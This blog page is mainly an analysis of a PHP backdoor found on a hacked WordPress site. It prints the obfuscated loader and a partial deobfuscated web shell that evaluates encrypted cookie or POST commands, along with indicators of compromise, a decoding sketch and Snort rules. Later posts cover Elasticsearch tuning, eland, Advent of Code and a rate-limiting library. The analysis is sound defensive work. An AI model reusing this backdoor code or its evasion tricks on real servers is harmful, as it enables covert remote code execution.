Looking at PHP backdoor malware

Last week I helped out with a WordPress website that had been infected. The web hosting company detected some malware, but there was more malware that wasn’t detected yet. In this post I’m looking at that malware sample. This PHP file was probably uploaded using a vulnerability in a WordPress plugin.

The malicious code looked like this:


function asdasd0()
{
	echo 11111;
}

function vksXJAdk($Vsgjyqji, $unvnBFtDiJlf)
{
$Vsgjyqji = urldecode($Vsgjyqji);
$TTlBSYU = str_split($Vsgjyqji);
$action = "";
for ($i = 0; $i < strlen($Vsgjyqji);$i++) {
$action .= $TTlBSYU[$i] ^ $unvnBFtDiJlf[$i%12];
}
return $action;
}

$k = vksXJAdk($i, $eByjoghUea);

function asdasd1()
{
	echo 11111;
}

$f = vksXJAdk($j, $eByjoghUea);
$f($eByjoghUea, $k);

function asdasd2()
{
	echo 11111;
}

include_once ($eByjoghUea);

function asdasd3()
{
	echo 11111;
}

function asdasd4()
{
	echo 11111;
}


There’s clearly some obfuscation going on. The asdasd functions don’t have a role in the obfuscation. I suspect they are there to decrease the entropy of the file as a whole. This helps avoid detection, since scanning software uses high entropy as an indication that some obfuscation, compression or encryption is being used.
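To illustrate the entropy argument, here is a minimal Python sketch. It is not taken from any particular scanner: the `shannon_entropy` helper, the stand-in `payload` and the `filler` text are assumptions made up for this example. It only shows that appending repetitive filler lowers the byte-level entropy of a file as a whole.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total) for n in Counter(data).values())


# Stand-in for an encoded payload: every byte value occurs equally often
payload = bytes(range(256)) * 4
# Repetitive filler, similar in spirit to the asdasd functions
filler = b"function asdasd0()\n{\n\techo 11111;\n}\n" * 40

entropy_payload = shannon_entropy(payload)
entropy_padded = shannon_entropy(payload + filler)
print(entropy_payload, entropy_padded)
```

The padded file scores lower than the payload alone, which is the effect a scanner with a fixed entropy threshold could be fooled by.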

After deobfuscation (running it and setting a breakpoint to inspect the contents of $k), the code looked like this:

@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);

function shdp($data, $key)
{
    $out_data = "";
    for ($i = 0; $i < strlen($data);) {
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}
if (isset($_GET[673435]))
$temp=array_merge($_COOKIE, $_POST);
foreach ($temp as $data_key => $data) {
    $data = @unserialize(shdp(shdp(base64_decode($data), 'zs420ndune7gpn1hwwfgjf1tz52hkfglmt6'), $data_key));
    if (isset($data['ak'])) {
        if ($data['a'] == 'i') {
            $i = array(
                'pv' => @phpversion(),
                'sv' => '1.0-1',
            echo @serialize($i);
        } elseif ($data['a'] == 'e') {

This code gets executed by writing it to a file, loading that file with include_once, and deleting it afterwards with unlink. $f contains the string file_put_contents, which is used for the first step.

Reading this code, we can find a few indicators of compromise (IOCs):

  • 673435 is used as a GET parameter. The value is ignored. (Other variations use 47712 as the GET parameter.)
  • 6a59bb58c6c03d5103d44f3b7e5ebf07, the MD5 hash of 47712, is returned as the response when this GET parameter is supplied.
  • Base64-encoded cookie or POST data is supplied to the script. Note that there are also many legitimate use cases for doing this, which makes it easier to blend in with normal traffic. In addition, cookie values and POST data are less likely to end up in access logs than GET parameters, which also helps evade detection.
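Because the GET parameter does show up in access logs, the first indicator is easy to search for. The following is a rough Python sketch, assuming a common Apache/nginx style log format. The `find_probe_requests` helper and the sample log lines are hypothetical and only serve as illustration.

```python
import re

# Matches the two known numeric parameter names, but only as a parameter name
IOC_PARAM = re.compile(r"[?&](673435|47712)=")


def find_probe_requests(log_lines):
    """Return the log lines that contain one of the known GET parameters."""
    return [line for line in log_lines if IOC_PARAM.search(line)]


# Hypothetical access log lines, for illustration only
sample_log = [
    '203.0.113.7 - - [31/Dec/2023:10:00:00 +0000] "GET /wp-content/uploads/malware.php?673435=anything HTTP/1.1" 200 32',
    '203.0.113.7 - - [31/Dec/2023:10:00:05 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [31/Dec/2023:10:01:00 +0000] "GET /shop.php?id=1&47712=1 HTTP/1.1" 200 32',
    '198.51.100.4 - - [31/Dec/2023:10:02:00 +0000] "GET /orders.php?order=673435 HTTP/1.1" 200 900',
]

hits = find_probe_requests(sample_log)
for line in hits:
    print(line)
```

The last sample line is deliberately not reported: there 673435 is a parameter value, not a parameter name.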

Of course there’s nothing preventing the attacker from changing the constant 673435 (again). My best guess is that this GET parameter can be used to demonstrate a host is compromised. Speculating a bit: this could allow for selling access to the host to others, because this check could be done without knowing the password. The buyer of the access could verify that a URL like https://example.com/wp-content/uploads/malware.php?673435=anything returns 6a59bb58c6c03d5103d44f3b7e5ebf07, before paying for the access.

Only with the password (zs420ndune7gpn1hwwfgjf1tz52hkfglmt6 in this sample) can the host be used to evaluate arbitrary code. The password varies across the many samples I looked at. It is most likely unique per target. The password is used to decrypt the instructions, which are supplied either in cookies or in POST data. The encryption used is a repeating-key XOR cipher, applied twice: once with the password and once with the name of the cookie or POST field as the key.
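For analysing captured traffic, the decryption step can be mirrored outside PHP. Below is a minimal Python sketch of what shdp and the surrounding decoding appear to do, based on my reading of the sample above. The function names, the field name `session` and the serialized example payload are assumptions invented for this example, not values observed in the wild.

```python
import base64
from itertools import cycle

# Password taken from this particular sample
PASSWORD = b"zs420ndune7gpn1hwwfgjf1tz52hkfglmt6"


def repeating_xor(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def decode_field(name: str, value: str, password: bytes = PASSWORD) -> bytes:
    """Base64-decode a cookie/POST value, then undo both XOR layers."""
    once = repeating_xor(base64.b64decode(value), password)
    return repeating_xor(once, name.encode())


def encode_field(name: str, payload: bytes, password: bytes = PASSWORD) -> str:
    """Inverse of decode_field, only used here to build a test value."""
    once = repeating_xor(payload, name.encode())
    return base64.b64encode(repeating_xor(once, password)).decode()


# Hypothetical PHP-serialized instruction; the 'ak' value is made up
payload = b'a:2:{s:2:"ak";s:1:"x";s:1:"a";s:1:"i";}'
blob = encode_field("session", payload)
decoded = decode_field("session", blob)
print(decoded)
```

Since XOR is its own inverse, the same routine both encrypts and decrypts, which is why the backdoor only needs the single shdp function.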

After the data has been decrypted and unserialized, it contains one of two instructions. The type of instruction is encoded in the a key.

  • i: return information about the host (backdoor version (1.0-1) and PHP version)
  • e: evaluates PHP code (the code itself is in the d key)

I was curious whether more about this malware was known, so I started looking for earlier detections. I found this StackExchange post from 2018 where someone posts some similar malware with the i and e commands.

Searching GitHub led me to a useful resource on this strain of PHP malware, the repository bediger4000/php-malware-analysis. This repository contained many different variations collected by WordPress honeypots, going by the following aliases:

Since the two numeric GET parameters and the response hash can be converted to Snort rules, I decided to submit these to the snort-sigs mailing list:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP backdoor check of successful installation using GET parameter 47712"; flow:to_server,established; content:"GET /"; http_uri; content:"47712="; http_uri; classtype:web-application-activity; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000001;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP backdoor check of successful installation using GET parameter 673435"; flow:to_server,established; content:"GET /"; http_uri; content:"673435="; http_uri; classtype:web-application-activity; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000002;)

alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg:"SERVER-WEBAPP Indication of a successful PHP backdoor check, server responds with 6a59bb58c6c03d5103d44f3b7e5ebf07"; flow:to_client,established; content:"6a59bb58c6c03d5103d44f3b7e5ebf07"; http_client_body; reference:url,bartbroere.eu/2023/12/31/php-backdoor-malware/; sid:1000003;)

To decrease false positives, you could for example require that .php is in the path. An even better way to decrease false positives would be only raising an alert when rule 1 or 2 and rule 3 are activated. Snort’s activates and activated_by offer this functionality. This could be useful if you are monitoring an application where 673435 and 47712 are legitimate GET parameters, or the MD5 hash of 47712 is a valid server response.

Update: The PHP backdoor signatures have been improved and are now part of the Open Emerging Threats rules, available for download here

Tuning Elasticsearch for performant vector search

I noticed Elasticsearch was a bit slow when using cosineSimilarity on a dense_vector. Before thinking about it at all, I rather naively put all my data in only four indices. The largest of these indices were easily over 200 GB in size, mostly occupied by 512-float vectors. These vectors were already indexed for cosine similarity.

So what made the queries slow? In the background Elasticsearch runs on Lucene, which uses one thread per shard for queries. By default, Elasticsearch uses only one shard per index. This used to be five per index, before Elasticsearch 7. In my case this meant that my 128-core Elasticsearch cluster was using only 4 threads for a search!

Therefore, one of the simplest ways to use more shards (and cores) is to grow the number of indices. At query time this doesn’t have to be a problem, since you can use index patterns to search over multiple indices at once.

However, at some point adding more indices will stop helping. The results from each of the indices need to be merged by Elasticsearch, which will add overhead.

As a simple rule of thumb I would say get the number of cores in your cluster and split your data into that many indices, while keeping the size of indices somewhere between 1 and 10 GB. This maximizes the number of cores used for a search, while keeping the overhead of merging the results relatively small.

If your indices end up a lot smaller than 1 GB, you probably don’t need as many indices as cores. If your indices are still a lot larger than 10 GB, and your queries are not quick enough, you might want to increase the core count of your Elasticsearch cluster.

You can estimate the size of your indices in advance by inserting a representative sample of documents. You can check the size of the index on disk (with curl localhost:9200/_cat/indices for example), divide the size by the number of documents, and multiply by the total number of documents you want to index. This gives an idea of the size of the index you will end up with.
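The arithmetic of the size estimate and the rule of thumb can be written down in a few lines of Python. This is only a sketch of my own heuristic, not an Elasticsearch recommendation. The helper names and the sample numbers (a 50 MB sample of 20,000 documents, 320 million documents in total, 128 cores) are made up for illustration.

```python
GB = 10**9


def estimate_total_bytes(sample_bytes, sample_docs, total_docs):
    """Extrapolate the on-disk size from a representative sample."""
    return sample_bytes / sample_docs * total_docs


def suggest_index_count(total_bytes, cores, min_index_bytes=1 * GB):
    """One index per core, unless that would make indices smaller than ~1 GB."""
    largest_useful = max(1, int(total_bytes // min_index_bytes))
    return min(cores, largest_useful)


total = estimate_total_bytes(
    sample_bytes=50_000_000, sample_docs=20_000, total_docs=320_000_000
)
indices = suggest_index_count(total, cores=128)
per_index_gb = total / indices / GB
print(total / GB, indices, per_index_gb)
```

With these numbers the estimate is 800 GB in total, split over 128 indices of 6.25 GB each, which falls inside the 1 to 10 GB range. If the per-index size still ends up far above 10 GB, the sketch does not help: that is the case where adding cores is the remaining option.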

To summarize: while Elasticsearch recommends index sizes between 10 and 50 GB, I found that the performance of vector search in particular was better when the indices were between 1 and 10 GB.

Dumping an entire Elasticsearch index to csv with eland

With the 8.11.0 release of the Python package eland it got a lot easier to dump an Elasticsearch index to csv. All the code you need is this:

import eland

eland.DataFrame('http://localhost:9200', 'your-index').to_csv('your-csv.csv')

Before the 8.11.0 release, this method already existed in eland, but it needed as much memory as the size of your dataset. Now it streams the data batch-wise into a csv. Most of the code to achieve this was written by @V1NAY8. I only did some minor edits to get it to pass the pull request review.

While testing this, eland successfully dumped hundreds of gigabytes of data without any issues, and I never had to bother with scroll requests myself.

Advent of Code 2022 - Day 9 - part 1

To get ready for Advent of Code 2023, I continued where I stopped last year: day 9.

Here’s me struggling for 1 hour and 40 minutes spread across two days, because I tried to be clever. For viewing pleasure it has been sped up.

What goes wrong here is that I assumed incorrectly that a negative number to the power of zero would be -1. Quick maths turned out not to be good maths. The following bit of experimentation led me to believe that.

result = -5 ** 0  
assert result == -1

You may have already guessed that the order of operations fooled me. The ** operator binds more tightly than the unary - operator, so -5 ** 0 is evaluated as -(5 ** 0). The behaviour is different if I do the same using a variable:

x = -5
result = x ** 0
assert result == 1
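The same difference can be shown without a variable by adding parentheses. The small `sign` helper at the end is not part of my solution. It is just one conventional way to get -1, 0 or 1 from a number without any exponent tricks.

```python
# Unary minus is applied after **, so this is -(5 ** 0)
assert -5 ** 0 == -1

# With parentheses the base really is negative
assert (-5) ** 0 == 1


def sign(n):
    """Return -1, 0 or 1 depending on the sign of n."""
    return (n > 0) - (n < 0)


print(sign(-5), sign(0), sign(7))
```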

The solution that eventually led to the correct answer is in the code block below. After submitting the correct answer, I did some cleanup:

  • deleted some unreachable code
  • linted it
  • removed some debug lines
  • added some more comments
  • deleted the x ** 0 and y ** 0, since they are pointless now

from advent_of_code import *
import requests_cache


test_input = """R 4
U 4
L 3
D 1
R 4
D 1
L 5
R 2"""
input_9 = fetch_input(9)
# input_9 = test_input
movements = [x.split(' ') for x in input_9.splitlines()]
movements = [(x[0], int(x[1])) for x in movements]
visited = set()
head = (0, 0)
tail = (0, 0)

directions = {
# What coordinates change for each movement
#         x, y
    "U": (1, 0),
    "D": (-1, 0),
    "L": (0, -1),
    "R": (0, 1),
}


def modify_location(location, direction):
    # direction is either a movement letter or an (x, y) change
    if isinstance(direction, str):
        change = directions[direction]
    else:
        change = direction
    return location[0] + change[0], location[1] + change[1]

def direction_to_move(head, tail):
    x = head[0] - tail[0]
    y = head[1] - tail[1]
    # head and tail are at the same location, don't move
    if x == 0 and y == 0:
        return 0, 0
    # head and tail are at most one square apart (including diagonally)
    elif max(abs(x), abs(y)) == 1:
        return 0, 0
    # head and tail are too far apart, decide which direction to move the tail
    else:
        if x < 0:
            x = -1
        else:
            x = 0 if not x else 1
        if y < 0:
            y = -1
        else:
            y = 0 if not y else 1
        return x, y

tail_visited = set()
for direction, length in movements:
    for _ in range(length):
        head = modify_location(head, direction)
        tail = modify_location(tail, direction_to_move(head, tail))
        # keep track of where the tail has been:
        tail_visited.add(tail)

submit_answer(level=1, day=9, answer=len(tail_visited))

The lessons I learned: Don’t try to be clever and check your maths.

No more 429: Combining ratelimit and requests_cache

requests_cache is nice. ratelimit is nice. But they don’t play nicely together yet: If a request is coming from the cache that requests_cache maintains, ratelimit doesn’t “know that” and will still slow your script down for no reason. That’s why I published the ratelimit_requests_cache module. It offers a similar rate limiter to the ratelimit module, but invocations only count towards the rate limit if the request could not be served from the cache.

The usage is the same as the normal ratelimit package. You decorate a function with sleep_and_retry and a limiting decorator, in this case limits_if_not_cached:

import requests
import requests_cache
from ratelimit import sleep_and_retry
from ratelimit_requests_cache import limits_if_not_cached

@sleep_and_retry
@limits_if_not_cached(calls=1, period=1)
def get_from_httpbin(i):
    return requests.get(f'https://httpbin.org/anything?i={i}')

# Enable requests caching
requests_cache.install_cache()

# Notice that only the first ten requests will be ratelimited to 1 request / second
# After that, it's a lot quicker since requests can be served from the cache
# and the ratelimiter does not engage
for i in range(100):
    get_from_httpbin(i % 10)

This rate limiter is ideal for when an API call is expensive, measured in either time or money. Each distinct HTTP request has to be performed only once, and you are less likely to receive HTTP 429 status codes.

This rate limiter checks whether a request was served from the cache or not by checking the .from_cache attribute of the Response. That means that if you have a different caching mechanism, you could also set this .from_cache boolean attribute and use the decorator for other purposes just as easily.
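To make the idea concrete, here is a simplified Python sketch of a decorator that only counts responses whose from_cache attribute is false. It is not the actual implementation of ratelimit_requests_cache. The names `limit_uncached` and `FakeResponse` are hypothetical, and the sleeping is injected as a parameter so the example runs instantly without any network access.

```python
import time
from functools import wraps


def limit_uncached(calls, period, clock=time.monotonic, sleep=time.sleep):
    """Allow at most `calls` uncached responses per `period` seconds."""
    def decorator(func):
        recent = []  # timestamps of uncached responses in the current window

        @wraps(func)
        def wrapper(*args, **kwargs):
            response = func(*args, **kwargs)
            if getattr(response, "from_cache", False):
                return response  # cache hits never count towards the limit
            now = clock()
            recent[:] = [t for t in recent if now - t < period]
            recent.append(now)
            if len(recent) >= calls:
                # Budget used up: wait until the oldest call leaves the window
                sleep(period - (now - recent[0]))
            return response
        return wrapper
    return decorator


class FakeResponse:
    """Stand-in for a response object; only the from_cache flag matters."""
    def __init__(self, from_cache):
        self.from_cache = from_cache


slept = []   # records requested sleeps instead of really sleeping
seen = set()  # toy cache: remembers which arguments were requested before


@limit_uncached(calls=1, period=1, sleep=slept.append)
def fetch(i):
    hit = i in seen
    seen.add(i)
    return FakeResponse(from_cache=hit)


for i in range(6):
    fetch(i % 3)
print(len(slept))
```

Only the three uncached calls trigger a sleep; the three repeats are answered from the toy cache and pass straight through. Any object with a boolean from_cache attribute would work the same way, which is what makes the approach reusable with other caching mechanisms.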

To start using it, get it from PyPI:

python3 -m pip install ratelimit_requests_cache